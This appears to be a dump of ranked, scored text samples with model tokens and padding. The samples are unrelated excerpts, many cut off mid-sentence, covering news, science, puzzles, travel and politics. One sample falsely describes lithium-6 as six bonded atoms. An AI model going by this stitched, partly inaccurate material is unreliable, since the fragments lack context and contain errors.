blue lagoon in Buxton, Derbyshire, ignoring warnings that the clear blue waters have pH levels almost as strong as bleach and a re filled with rubbish + +Looks can be deceiving: The water in the disused quarry gets its blue and turquoise appearance from the Limestone hills surrounding it. The water looks like something from the Mediterranean + +Jayda Thompson, 14, right, and Remece Sabe, 13, left, paddle in the waters after being taken to the 'attraction' with their relative Sam Ahmed. She said it was alright for them to go in the 'amazing' water, as long as they were no deeper in than their neck They state how the water is toxic enough to cause ‘skin and eye irritations, stomach problems and fungal infections’. Yet parents have been spotted pulling their babies around in rubber rings on the water, while families, groups of youths and even stag parties all regularly make the trek to the lake. Caitlin Bisknell, a local councillor, said the site at Harpur Hill, near Buxton, on the fringe of Derbyshire’s Peak District, had been attracting sunbathers and swimmers for at least the last decade. Splashing around: Jayda swims in the lagoon. The pH levels in the water are almost as strong as bleach can cause skin and eye irritations, as well as stomach problems and even thrush + +Ignoring warnings: Mrs Ahmed smiles as she watches relatives Jayda, Remece, Tristan Thompson, aged six, left, and Malachi Croft, aged five, paddle in the perilous waters which +================================================================================ +Rank = 42; Score = 1036288.0 +<|begin_of_text|>2011 + +Hecho en México….me cae, que vergüenza nacional. Ahora las dichosas, famosas, omnipotentes y glamorosas preseas mexicanas de los juegos Panamericanos se han empezado a despintar a menos de 2 semanas de su entrega, ¡HECF! + +¿Pues no se suponen que eran de oro, plata y bronce? Claro que no, para comparación utilicemos las medallas olímpicas. La última medalla olímpica de oro que realmente era de oro fue otorgada en 1912. Pero por el hecho de que no sean de oro no quiere decir que son de baja calidad. Las medallas olímpicas de oro y plata están hechas de plata. Las medallas de oro llevan un recubrimiento de al menos 6 gramos de oro. Las medallas de bronce están hechas de una aleación de bronce, cobre y estaño. Pero claro, estamos hablando de las medallas olímpicas. Las medallas que fueron entregadas en los pasados juegos Panamericanos de Guadalajara fueron hechas de cobre con un bañito a la mexicana de cada metal respectivo… + +Pero el bañito fue hecho tan a la mexicana que algunas medallas comenzaron a despintarse desde el primer día que fueron entregadas. + +Aquí las reclamaciones de los participantes de los Panamericanos: + +El remero Patrick Loliger, fue de los primeros en notar que su presea de tercer lugar comenzó a tornarse grisácea. Tras reclamar a la Casa de Moneda de México, encargada de acuñar las medallas, pidieron una disculpa y ofrecieron cambiarla. + +“La medalla desde el primer día se empezó a despintar hasta que quedó de un color como acero y se le cayó la pintura color bronce. También las de tercer lugar de mi equipo se despintaron, y sé que de algunos otros deportistas también”, aseguró el deportista. + +El argentino Alexis Clementín, que ganó la medalla la medalla de bronce en pelota, en la categoría frontenis, también sufrió la mala calidad de las medallas: + +“Mi mamá le puso un producto y quedó brillante, como al principio +================================================================================ +Rank = 43; Score = 1028096.0 +<|begin_of_text|>After a video emerged appearing to show Hillary Clinton struggling to stand upright before stumbling into a car at a 9/11 memorial ceremony in New York City Sunday, the presidential candidate was forced to go public with the pneumonia diagnosis she received two days before. + +But the near-fainting spell was in fact due to dehydration, exacerbated by her condition. Her husband Bill Clinton said Monday that it wasn’t the first time. “Rarely, but on more than one occasion, over the last many, many years, the same sort of thing’s happened to her where she just got severely dehydrated,” he said. + +Politico reports, citing unnamed sources, that Clinton is chronically dehydrated, and that her reluctance to regularly drink water has become a “source of tension” between the candidate and her staff. “She won’t drink water, and you try telling Hillary Clinton she has to drink water,” a source in close contact with the Democratic candidate said. Politico described a hectic rehydration mission which included lots of bottles of water as well as Gatorade. + +In 2013, CBS reported that some 75% of Americans may be functioning in a chronic state of dehydration, many mistaking the symptoms for other illnesses. Whether she’s among them or not, the Democratic nominee might be better off taking a big gulp next time a staff member approaches with a glass of water. Here’s everything you need to know about dehydration: + +The Brief Newsletter Sign up to receive the top stories you need to know right now. View Sample Sign Up Now + +Why do we get dehydrated? + +Dehydration occurs when your body loses more fluid than you take in, upsetting its balance of salts and sugar, which affects the way it functions. Water makes up between 60-70% of average adult— and it’s important to keep levels stable. Water is essential for life and our body uses it in many different ways, from lubricating joints and regulating our temperature to enabling waste removal via sweating, bowel movements and urination. + +If not treated immediately, chronic – or ongoing – dehydration can lead to serious medical complications; it can affect your kidney function, increase the risk of kidney stones and lead to muscle damage and constipation. This level of dehydration requires hospital treatment where a sufferer will be attached to a drip to restore fluids. Of patients treated for kidney stones, 50% are likely to have a recurrence within ten years. + +How do we get dehydrated? + +Usually, by not drinking enough fluid – usually water – to replace what you lose. +================================================================================ +Rank = 44; Score = 1007616.0 +<|begin_of_text|>The final frontier smells a lot like a Nascar race—a bouquet of hot metal, diesel fumes and barbecue. The source? Dying stars, mostly. + +The by-products of all this rampant combustion are smelly compounds called polycyclic aromatic hydrocarbons. These molecules "seem to be all over the universe," says Louis Allamandola, the founder and director of the Astrophysics and Astrochemistry Lab at NASA Ames Research Center. "And they float around forever," appearing in comets, meteors and space dust. These hydrocarbons have even been shortlisted for the basis of the earliest forms of life on Earth. Not surprisingly, polycyclic aromatic hydrocarbons can be found in coal, oil and even food. + +Though a pure, unadulterated whiff of outer space is impossible for humans (it's a vacuum after all; we would die if we tried), when astronauts are outside the ISS, space-borne compounds adhere to their suits and hitch a ride back into the station. Astronauts have reported smelling "burned" or "fried" steak after a space walk, and they aren't just dreaming of a home-cooked meal. + +The smell of space is so distinct that, three years ago, NASA reached out to Steven Pearce of the fragrance maker Omega Ingredients to re-create the odor for its training simulations. "Recently we did the smell of the moon," Pearce says. "Astronauts compared it to spent gunpowder." + +Allamandola explains that our solar system is particularly pungent because it is rich in carbon and low in oxygen, and "just like a car, if you starve it of oxygen you start to see black soot and get a foul smell." Oxygen-rich stars, however, have aromas reminiscent of a charcoal grill. Once you leave our galaxy, the smells can get really interesting. In dark pockets of the universe, molecular clouds full of tiny dust particles host a veritable smorgasbord of odors, from wafts of sweet sugar to the rotten-egg stench of sulfur. + +This article originally appeared in the February 2011 issue of Popular Science_ magazine._<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 45; Score = 966656.0 +<|begin_of_text|>1. The Camels Four tasmanian camels traveling on a very narrow ledge encounter four tasmanian camels coming the other way. As everyone knows, tasmanian camels never go backwards, especially when on a precarious ledge. The camels will climb over each other, but only if there is a camel sized space on the other side. The camels didn't see each other until there was only exactly one camel's width between the two groups. How can all camels pass, allowing both groups to go on their way, without any camel reversing? Show Hint Show Solution Hint: Use match sticks or coins to simulate the puzzle. Solution: First a camel from one side moves forward, then two camels from the other side move forward, then three camels from the first side move forward etc... + +etc... + +2. The Waiter Three men in a cafe order a meal the total cost of which is $15. They each contribute $5. The waiter takes the money to the chef who recognizes the three as friends and asks the waiter to return $5 to the men. The waiter is not only poor at mathematics but dishonest and instead of going to the trouble of splitting the $5 between the three he simply gives them $1 each and pockets the remaining $2 for himself. Now, each of the men effectively paid $4, the total paid is therefore $12. Add the $2 in the waiters pocket and this comes to $14.....where has the other $1 gone from the original $15? Show Solution Solution: The payments should equal the receipts. It does not make sense to add what was paid by the men ($12) to what was received from that payment by the waiter ($2) Although the initial bill was $15 dollars, one of the five dollar notes gets changed into five ones. The total the three men ultimately paid is $12, as they get three ones back. So from the $12 the men paid, the owner receives $10 and the waiter receives the $2 difference. $15 - $3 = $10 + $2. + +3. The Boxes There are three boxes. One is labeled "APPLES" another is labeled "ORANGES". The last one is labeled "APPLES AND ORANGES". You know that each is labeled incorrectly. You may ask me to pick one fruit from one box which you choose. How can you label the boxes correctly? Show Solution Solution: Pick from the one labeled "Apples & Oranges". This box must contain either +================================================================================ +Rank = 46; Score = 962560.0 +<|begin_of_text|>Temperatures are warming up in the world of astronomy after a team of researchers discovered ice crystals on a comet, suggesting it could be as old as the solar system. + +An international research team discovered the ice in crystalline form on the surface of comet 67P Churyumov-Gerasimenko, Churi for short, indicating that it was formed 4.6 billion years ago — the results of the experiment have been published in the Astrophysical Journal. + +The comet, which is part of the planet Jupiter family, has found to have ice crystals on its surface that could have originated in space before the solar system or the sun was formed in conditions described by scientists as protosolar nebula. + +Hi @ESA_Rosetta! Comet #67P on 05 Mar 16 from a distance of 20km (more at https://t.co/lNzznIHGkw) pic.twitter.com/tyzkA2AS3a — Rosetta OSIRIS (@Rosetta_OSIRIS) 10 March 2016​ + +By analyzing chemicals trapped in the ice on the comet's surface, researchers were able to determine the age of the ice crystals using a mass spectrometer — which is an instrument that can measure the masses and relative concentrations of atoms and molecules. A statement from the French National Center for Scientific Research (CNRS) said: + +"If comets are made of crystalline ice, this means that they must have formed at the same time as the solar system, that than earlier in the interstellar medium." + +Before Life Began + +The discovery of ice crystals on Churi could have implications on future research surrounding how the earth and solar system began life. + +"In October 2014 [the mass spectrometer] first measured amounts of molecular nitrogen (N2), carbon monoxide (CO) and argon (Ar) in Churi's ice," a statement from the French National Centre for Scientific Research (CNRS) said. + +© Flickr / Stuart Rankin Comet Chaser Discovers Oxygen on 67P/ Churyumov-Gerasimenko + +"The data was compared with that from laboratory experiments on amorphous ice, as well as from models describing the composition of gas hydrates, a type of crystalline ice in which water molecules can trap molecules of gas." + +The levels of nitrogen and argon gas in the ice led the researchers to conclude that is had a crystalline structure, suggesting the ice on the surface of the comet could have been formed before the solar system, or even at the same +================================================================================ +Rank = 47; Score = 958464.0 +<|begin_of_text|>In the minds of the Japanese press and their readers, the United States government under the Obama administration dislikes - if it doesn't, it should and it must - the Japanese "right-wing" administration of Shinzo Abe, and it condemns - if it doesn't, it should and it must - the State Secrecy Protection Law that just passed the Upper house in Japan. + +So when the Japanese reporters write about the US reaction (if any) to the law, they try their best to elicit the response they want to hear; failing that, they still hear what they want to hear and write about what they believe they hear. In other words, they goalseek. + +First it was Mainichi Shinbun (12/7/2013) who reported on the US reaction to the passage of the State Secret Protection Law: + +ハーフ副報道官は「情報の保全は同盟国間の協力に決定的な役割を果たす」と述べ、日米両政府が共有する情報の保全が必要であるとの認識を示した。ただ、ハーフ氏は「表現の自由、報道の自由などの普遍的価値の共有が我々の同盟関係の基盤である」とも述べ、同法を根拠に言論の自由を制限することがないよう日本政府に求めた。 + +Deputy Spokesperson Harf said "Information security plays a critical role in alliance cooperation," indicating security of information shared by both the Japanese government and the US government is necessary. However, [Ms.] Harf also said, "A foundation of our alliance is a shared commitment to universal values such as freedom of expression and freedom of the press," by which remark she requested the Japanese government not to limit the freedom of speech based on the [State Secrecy Protection] Law. + +Thus, according to Mainichi, the US Obama administration has expressed concern that the Japanese government may restrict freedom of speech under the law. + +That's odd, I thought, coming from this US administration. + +Then, the Asahi Shinbun reporter whom I follow on Twitter tweeted about part of the US State Department Press Briefing on December 6, 2013, which concerned the State Secrecy Protection Law that passed the Opper House on December 6 (Japan Standard Time) and became the law of the land. He said: + +秘密保護法の制定は米政府が日本に長年求 +================================================================================ +Rank = 48; Score = 946176.0 +<|begin_of_text|>WARNING: Do not simply use the formula of a common chemical without obfuscating it in some way. It could be dictionary cracked very easily if you do. A serious recommendation is to use a strong password generator rather than this technique and to store passwords in a digital safe itself locked with a strong password. + +Coming up with a secure password that cannot be bruteforce or dictionary attacked but that is easy to remember is quite troubling. So, here’s the nerdiest approach yet. + +Think of a compound, any compound, but preferably one with which you are familiar. If you’re in science, then you could pick a compound associated with your research thesis or perhaps the medication you needed to get through the viva. + +Now, work out, or look up, its chemical formula. BUT DO NOT STOP THERE…Next, think of a simple algorithm to obfuscate the formula (reverse it and chop off each end perhaps, or if it is a long formula extract all the numbers and put them at one end instead of after each element symbol, you get the idea). Of course, if you pick a compound that happens to share the first couple of letters with the name of the site to which you are logging in, then that should make it easier to remember too. + +If you suffer from hayfever you might be using flixonase, when you login to flickr, for example. Formula: C25H31F3O5S, password could be CHFOS253135 or 5O3F13H52. No bruteforce hack attack is going to figure those out in a hurry. Specialists in secondary messenger chemistry with a MySpace account could choose myo-inositol (C6H12O6 –> CHO6126), while nutritional chemists could hide their Facebook behind Factor II (vitamin B12) C 63 H 89 CoN 14 O 14 P –> CHCONOP63891414. + +Of course, you will have to think of your own examples, but with CAS and ChemSpider registering tens of millions of structures, that should not be too hard to do. + +Of course, being a chemist you also know about InChi and Smiles string, which could provide you with an even more sophisticated password. The InChi string for aspirin, for instance, is InChI=1/C9H8O4/c1-6(10)13-8-5-3-2- +================================================================================ +Rank = 49; Score = 929792.0 +<|begin_of_text|>International Journal of Environmental Research and Public Health (IJERPH). All are free. + +Three good articles from the open-access). All are free. + +Received: 26 June 2012; in revised form: 13 August 2012 / Accepted: 18 August 2012 / Published: 24 August 2012 Download PDF Full-text (235 KB) + +Abstract: The Silver Impregnated Porous Pot (SIPP) filter is a product of the Tshwane University of Technology manufactured for the production of safe drinking water at a household (home) level. Two SIPP devices were assessed for the reduction efficiency of chemical contaminants such as calcium, magnesium, iron, arsenic, fluorides and total organic carbon (TOC) as well as microbial contaminants from environmental samples. Turbidity change after filtration, together with correlation between chlorophyll a in the feed water and SIPP’s flow rates were also evaluated in order to give comprehensive guidelines on the quality of intake water that could be filtered through the filter without causing a significant decrease in flow rate. The SIPP filters removed contaminants from environmental water samples as follows: 70% to 92% iron, 36% to 68% calcium, 42% to 82% arsenic, 39% to 98% magnesium, 39% to 95% fluorides, 12% to 35% TOC and 45% to 82% turbidity. The SIPP filters had initial flow rates of 1 L/h to 4 L/h but the flow rates dropped to 0.5 L/h with an increase in cumulative volume of intake water as the filter was used. Turbidity and chemical contaminant reduction rates decreased with accumulating volume of intake water but the filter removed Ca, Fe and Mg to levels that comply with the South African National Standards (SANS 241) and the World Health Organization (WHO) guideline values. However, the SIPP filters cannot produce enough water to satisfy the daily drinking water requirement of a typical household (25 L/p·d). Chlorophyll a was associated with a decrease in the flow rate through the SIPP filters. + +Abstract: Irregular precipitation associated with global climate change had been causing various problems in urban regions. Besides the runoff due to rainfall in summer, the snowmelt runoff in early spring could also play an important role in deteriorating the water quality of the receiving waters. Due to global climate change, the snowfall has increased gradually in individual regions, and snow +================================================================================ +Rank = 50; Score = 913408.0 +<|begin_of_text|>The Blue Lagoon is a geothermal spa found on the Reykjanes Peninsula in southwest Iceland. It is the most popular attraction in Iceland drawing people from all across the world. Go here to find the largest selection of Blue lagoon tours in Iceland The Lagoon is just a fifteen-minute drive from Keflavík International Airport, or a thirty-minute drive from Reykjavík, located between the two. It is thus often visited straight after arrival to the country or right before departure. There are few better ways to recharge after a long-flight or action-packed holiday. History The Blue Lagoon started as a pool of wastewater from the Svartsengi geothermal plant in 1976. The first person to bathe there was Valur Margeirsson in 1981. He was met with some resistance prior to taking the first dip as people thought he was mad for wanting to bath in a "blue mud pool". He and others soon began to notice the unusual but remarkable healing qualities of the azure waters. Those with conditions such as psoriasis found the waters immediately soothing for their condition. News quickly spread, and by 1987, the first swimming facilities were officially opened. Since then, the establishment has only grown, from an open pool with no surrounding buildings to a luxurious spa, research centre and hotel. Today The Blue Lagoon is considered to have such notable regenerative qualities because the water is rich in silica and sulphur. A research and development facility on site finds cures and remedies for skin ailments, and silica mud is available for free on the sides of the pool for guests to enjoy a facemask. The temperature in the bathing and swimming area is very comfortable, averaging 37–39° C (98–102° F). The Blue Lagoon also boasts the LAVA Restaurant, the Blue Café and the Lagoon Spa: you can thus enjoy cocktails, health products, delicious meals and treatments such as massages without leaving the premises. Saunas, steam rooms and a small waterfall are also on site. For all of these reasons and more, the Blue Lagoon is considered to be one of the most enjoyable and romantic spots in the country. It is surrounded by a plethora of fantastic volcanic landscapes, and the water itself is opaque and vividly blue. Rising pillars of steam only add to the spa’s fantastic ambience. Things to Note The Blue Lagoon Spa is open throughout the year, and popular in every season. Due to the fact it has a maximum capacity for the comfort of its guests, +================================================================================ +Rank = 51; Score = 913408.0 +<|begin_of_text|>How many atoms are there in a kilogram of silicon? This number is Avogadro’s constant and working out its value is one of the more important tasks that materials scientists face. + +Today, a group of physicists reveal the answer. They say there are 6.02214084(18) × 10^23 atoms in a single crystal of silicon weighing about a kilogram. And they say they know this is right because they’ve counted them. Yep, counted them. + +Actually, they counted the number of atoms in a unit volume of silicon and measured the size of this volume. The number of times this fits into a lump of exactly 1 mole of near perfect single crystal sphere of silicon is Avogadro’s number. + +To have established this number to such accuracy is clearly an important piece of work but just how impressive is put in perspective by the monumental efforts of the international consortium behind it. + +The work began in 2004 when a Russian group created a sample of silicon flouride with a specific isotopic content at the Central Design Bureau of Machine Building in St. Petersburg. A team at the Institute of Chemistry of High-Purity Substances of the Russian Academy of Sciences in Nizhny-Novgorod then turned this into a polycrystal of silicon hydride which a group at the Leibniz-Institut fur Kristallzuchtung in Berlin used to grow a 5kg lump of pure monocrystalline silicon in 2007. + +The Australian Centre for Precision Optics then took samples from this lump and shaped them into quasi-perfect spheres. They then made an x-ray interferometer from the left over silicon to determine its crystal structure. They also measured crystals’ surfaces to see what kind of crud had built up there and would therefore have to be taken into account in the final calculations. (Various copper, nickel and silicon oxides had built up on the surface.) + +Various groups then measured the mass of the spheres by comparing them to the platinum-iridium test kilograms owned by the PTB (Physikalisch-Technische Bundesanstalt) in Germany, the National Metrology Institute of Japan in Tskuba and the Bureau International des Poids et Mesures in France. + +The team then measured the volume of the spheres using optical interferometry. And the isotope content was measured by teams at the University of Warsaw, the Institute of Mineral Resources of the Chinese Academy of Science and Institute for Physics of Microstructures of the Russian Academy of Sciences. + +Finally, the number of +================================================================================ +Rank = 52; Score = 909312.0 +<|begin_of_text|>Structural configuration + +The schematic structure of the flexible FENG-based acoustic transducer is shown in Fig. 1a. The total thickness of the device is <100 μm. The functional material of the FENG-based acoustic transducers is prepared by starting with polypropylene film containing tiny foreign silicates particles (0.1–10 μm), as shown in Supplementary Fig. 1. Polypropylene (PP) is a type of commodity plastic with the merits of low density, high flexibility and good resistance to fatigue30,31. Once the PP film experiences stretching in two perpendicular directions, the inorganic particles serve as stress concentrators or micocracks, allowing the film to be filled with lens-shaped voids with diameters ranging from 1 to 100 μm. During this process, high pressure (for example, 5 MPa) nitrogen or carbon dioxide gas is diffused into the PP film, so that the internal pressure within the voids becomes equal to the external pressure. Next, the external gas pressure is suddenly released, resulting in dramatically swell of those voids in PP film. For the purpose of stabilizing and stiffening the swelling voids at room temperature, thermal treatment (usually >100 °C) is carried out to increase the crystallinity of the polymer matrix32,33,34. Subsequently, by applying a large electric field to the treated film, Paschen breakdown occurs inside the voids. The current within the air gap transfers a sheet charge density across the air gap. During microplasma discharge, charges separated by the ionization of the gas transportation under the charging field and light flashes can be observed with the naked eye, forming a ‘microstorm’. After microplasma discharging, two thin layers of silver (500 nm) were deposited on both top and bottom side of PP film (80 μm) by sputtering. Scanning electron microscopyimages of the cross-section of PP foam are shown in Fig. 1b. Herein, backscattered electrons are used for revealing good contrast and clear definition of the structure. As the production of backscattered electrons is strongly dependent on the average atomic number of the sample, silicate particles appeared to be much brighter than their surrounding structure. Figure 1c shows the optical images of FENG-based acoustic device rolled along the axial of a glass tube. The highly flexible fabricated device consists of a stacked metal-insulator-metal thin-film structure without moving parts or microfabrication features or suspended structures, making the +================================================================================ +Rank = 53; Score = 880640.0 +<|begin_of_text|>The only painful part of wearing an adhesive bandage is having to peel them off, so researchers at Purdue University's Birck Nanotechnology Center have developed a way to turn Band-Aids into a nearly pain free alternative to needles. By integrating a tiny heat-powered pump, adhesive patches could automatically deliver medication to a patient without the need for a painful prick. + +What's most interesting is that the tiny pump isn't packed full of nano-scale sized bleeding-edge technology. Instead, a small chamber sandwiched between layers of flexible polymer is filled with nothing more than sugar and baker's yeast. When the patch is stuck to the skin and moistened, the water and the patient's body heat causes the yeast and sugar to ferment which produces carbon dioxide. And as the CO2 gas causes the chamber to expand, it pushes against the flexible polymer membranes which could one day be covered in microneedles that automatically inject a given type of medication through the skin without the patient ever feeling a thing. + +Advertisement + +The Purdue researchers aren't the first to explore the possibilites of the microneedle approach, but the development of their fermentation pump means that medicinal patches could be incredibly cheap to produce, and easy to use. And somehow slapping a Tylenol patch on your forehead just seems like it would be far more effective than taking a pill. [Purdue University via Gizmag] + +Image by Taavi Toomasson/Shutterstock<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 54; Score = 876544.0 +<|begin_of_text|>Humanity has been in space for a while, but we really haven't managed to go very far. Carl Sagan once said that "the surface of the Earth is the shore of the cosmic ocean, and recently we've waded a little way out, maybe ankle deep"—that was in 1980, and we haven't risked testing the water any deeper since then. + +One of the main reasons for that, though, is that space is so frustratingly massive. Voyager 1 is the fastest man-made thing ever, but 17 kilometers per second is a tiny fraction of the speed of light. Even getting to one of our nearest neighbors, Mars, would take six to eight months using conventional spaceship engines. Ideas like warp drives are still theoretical, and unlikely to be seen within our lifetimes. However, it might be possible to cut that trip to Mars down to as few as three months using a form of fusion fuel—"dilithium crystals." Yep, just like Star Trek. + +It's not quite the same, of course. In the sci-fi series, the crystals are a rare substance that the crew spend an inordinate amount of time searching for, and their engines can use it to travel faster than the speed of light. This engine, currently under development at the University of Hunstville by a team working in collaboration with Boeing, NASA and the Oak Ridge National Laboratory, would by comparison be about twice as fast as the best current technology. + +According to Txchnologist, General Electric's online tech magazine, this fusion reactor would be fueled by "a few tons" of deuterium (a heavy isotope of hydrogen) and lithium-6 (a stable molecule of lithium) in a crystalline structure‚ hence the "dilithium crystal" claim. Technically, dilithium is a molecule with two covalently bonded lithium atoms, while lithium-6 features six bonded atoms, but we can forgive them for the temptation of using a little poetic license. When the deuterium and the lithium-6 are forced together under high pressure they undergo a fusion reaction—a process which they're still trying to turn into a net producer of energy. While fusion isn't yet a viable fuel source, recent developments in the field seem to indicate that we can't be far away. + +The engine, dubbed the "Charger-1 Pulsed Power Generator", would be constructed in space along with the rest of the spaceship to avoid the tricky engineering difficulties of getting all that delicate fusion equipment up through the atmosphere +================================================================================ +Rank = 55; Score = 876544.0 +<|begin_of_text|>2. 6. 2014 + +Jenže neviditelná ruka trhu Brazílii zfackovala za její tvrdošíjnou demokratickou volbu. Brazilská měna přišla o 30 procent své hodnoty, 6 miliard dolarů horkých peněz opustilo zemi a některé agentury daly Brazílii nejvyšší rizikové hodnocení na světě. "Jsme ve vládě, ale nemáme žádnou moc," řekl Lulův blízký poradce, dominikánský mnich Frei Betto. "Dnešní moc je globální moc, moc velkých podniků, moc finančního kapitálu." + +Omezená schopnost vlád států realizovat jakoukoliv politiku, kterou předem neschválil mezinárodní kapitál, je dnes křížem, na nějž jsme byli přibiti všichni. Národní stát je poslední zbývající primární demokratická struktura. Avšak vzhledem k intenzitě neoliberální globalizace už zjevně národní stát nesplňuje svou roli. + +Z mnoha hledisek jsou korporace vlivnějšími hráči v globálních záležitostech než státy," píše Benjamin Barder v knize Jihad versus McWorld. "Říkáme jim multinacionální, ale jsou vlastně postnacionální, transnacionální nebo dokonce protinacionální. Protože odmítají samotnou myšlenku národů i veškerý ostatní provincionalismus, který je omezuje v čase či v prostoru." + +Nedávné úspěchy ultrapravice v evropských parlamentních volbách jen dokazují, jak patologickými se tyto příznaky staly. Nacionalistické a otevřeně xenofobní strany zvítězily ve třech zemích - v Dánsku, ve Francii a v Británii - a získaly více než 10 procent v dalších pěti zemích. Toto vítězství ve volbách do parlamentu s velmi malou mocí s velmi malou účastí se samozřejmě nesmí přehánět. UKIP získala v Británii jen 9 procent podpory všech voličů, francouzská Národní fronta jen 10,6 procent a dánská Lidová strana 15 procent. +================================================================================ +Rank = 56; Score = 864256.0 +<|begin_of_text|>A powerful communications satellite was boosted into orbit Sunday by a United Launch Alliance Atlas 5 rocket that will provide broadband internet service to passenger jets and rural consumers across the United States and parts of Canada and Central America that do not have access to cable or fiber networks. + +Running 46 minutes late because of a last-second technical snag, the 1.6-million-pound Atlas 5, equipped with three strap-on solid-fuel boosters for extra power, roared to life at 2:13 p.m. EST (GMT-5) and quickly lifted off from launch complex 41 at the Cape Canaveral Air Force Station in Florida, arcing away to the east under a mostly clear sky. + +Rapidly accelerating as it consumed its liquid oxygen and kerosene propellants, the 194-foot-tall rocket put on a weekend show for area residents, beachgoers and tourists, leaving a long trail of exhaust in its wake as it climbed out of the dense lower atmosphere and disappeared from view. + +The Russian-built RD-180 engine powering the first stage chalked up an apparently flawless performance, handing off to the rocket’s Aerojet Rocketdyne RL10C Centaur second stage engine a little more than four-and-a-half minutes after launch. + +As planned, the hydrogen-fueled Centaur engine fired twice and 32 minutes after launch, the 14,914-pound relay station was released from the second stage into a so-called “supersynchronous” orbit with a low point of 127 miles and a high point of around 40,389 miles. + +EchoStar 19’s on-board propulsion system will be used to circularize the orbit at an altitude of 22,300 miles above the equator where spacecraft take 24 hours to complete one trip around the planet. In such geosynchronous orbits, satellites appear to hang stationary in the sky, allowing the use of fixed antennas on the ground. + +EchoStar operates a fleet of two dozen solely owned, leased and managed relay stations. EchoStar 19, built by Space Systems Loral, will be stationed over North America to provide high-speed broadband internet service from HughesNet, an EchoStar subsidiary that currently serves more than a million customers with two existing satellites -- EchoStar 17 and Spaceway 3. + +Along with providing service to rural areas not wired for broadband, EchoStar 19 also will provide 200 megabits-per-second access to passenger jets. + +An artist’s depiction of the EchoStar 19 broadband satellite in orbit. EchoStar + +“It +================================================================================ +Rank = 57; Score = 864256.0 +<|begin_of_text|>"Gly" redirects here. For the unit of measurement, see light-year + +Glycine (symbol Gly or G;[4] )[5] is the amino acid that has a single hydrogen atom as its side chain. It is the simplest possible amino acid. The chemical formula of glycine is NH 2 ‐CH 2 ‐COOH. Glycine is one of the proteinogenic amino acids, and is notable as the only one that is achiral. 